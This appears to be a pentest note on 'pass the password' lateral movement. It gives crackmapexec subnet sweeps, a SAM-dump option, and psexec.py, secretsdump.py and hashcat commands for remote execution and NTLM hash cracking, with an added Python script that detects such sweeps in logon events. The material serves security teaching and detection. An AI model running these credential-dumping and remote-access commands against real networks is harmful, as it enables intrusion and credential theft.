Pass the Password

The basic syntax using crackmapexec:

crackmapexec <entire network ip>/<cidr> -d domain -u user -p password
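Seen from the defending side, running one credential across a whole range like this produces network logons for the same account on many hosts from a single source within seconds. The following is an added example (not from the original page or from crackmapexec) that flags that pattern in a constructed export of logon events; the CSV column layout, the thresholds and the function names are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of network logons (Windows Security events 4624 = success,
# 4625 = failure, LogonType 3), exported as: time,event_id,target_host,account,source_ip
SAMPLE_EVENTS = """
2024-05-01T02:00:00,4624,WS01,svc_backup,10.0.0.9
2024-05-01T03:00:00,4624,WS02,svc_backup,10.0.0.9
2024-05-01T04:00:00,4624,WS03,svc_backup,10.0.0.9
2024-05-01T05:00:00,4624,WS04,svc_backup,10.0.0.9
2024-05-01T09:00:00,4624,FS01,alice,10.0.0.21
2024-05-01T09:30:00,4624,FS01,alice,10.0.0.21
2024-05-01T10:00:01,4624,WS01,svc_backup,10.0.0.50
2024-05-01T10:00:02,4625,WS02,svc_backup,10.0.0.50
2024-05-01T10:00:02,4624,WS03,svc_backup,10.0.0.50
2024-05-01T10:00:03,4624,WS04,svc_backup,10.0.0.50
2024-05-01T10:00:04,4625,WS05,svc_backup,10.0.0.50
"""

def parse(text):
    """Yield (time, event_id, host, account, source_ip) tuples from the export."""
    for line in text.strip().splitlines():
        ts, event_id, host, account, src = line.split(",")
        yield datetime.fromisoformat(ts), int(event_id), host, account.lower(), src

def find_sweeps(events, min_hosts=4, window=timedelta(seconds=60)):
    """Flag (source, account) pairs that reach >= min_hosts distinct hosts within window."""
    by_key = defaultdict(list)
    for ts, event_id, host, account, src in events:
        if event_id in (4624, 4625):
            by_key[(src, account)].append((ts, host, event_id))
    alerts = []
    for (src, account), hits in by_key.items():
        hits.sort()
        best_hosts, best_ok, start = set(), 0, 0
        for end in range(len(hits)):
            # Slide the window start forward until the span fits inside `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            span = hits[start:end + 1]
            hosts = {h for _, h, _ in span}
            if len(hosts) > len(best_hosts):
                best_hosts, best_ok = hosts, sum(e == 4624 for _, _, e in span)
        if len(best_hosts) >= min_hosts:
            alerts.append({"source": src, "account": account,
                           "hosts": sorted(best_hosts), "successes": best_ok})
    return alerts

if __name__ == "__main__":
    for alert in find_sweeps(parse(SAMPLE_EVENTS)):
        print(alert)
```

The same account used from 10.0.0.9 is not flagged because its logons are hours apart, so the time window is what separates a scheduled job from a sweep.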

I recommend you check this article too to learn a bit more about the usage of cme:

Once you get the pwn3d machines, you can use psexec or similar, or you can use some of the modules and options provided by crackmapexec, as shown in the blog. For example:

To dump the SAM file (this does not always work):

crackmapexec <entire network ip>/<cidr> -d domain -u user -p password --sam

psexec:

psexec.py domain/username:password@ip_of_the_machine

secretsdump to dump hashes:

secretsdump.py domain/username:password@ip_of_the_machine

Once you have dumped the NTLM hashes, you can use, for example, hashcat to crack them (basic command):

hashcat -m 1000 hashfile dict_file -O

You can find more of this cool stuff here:
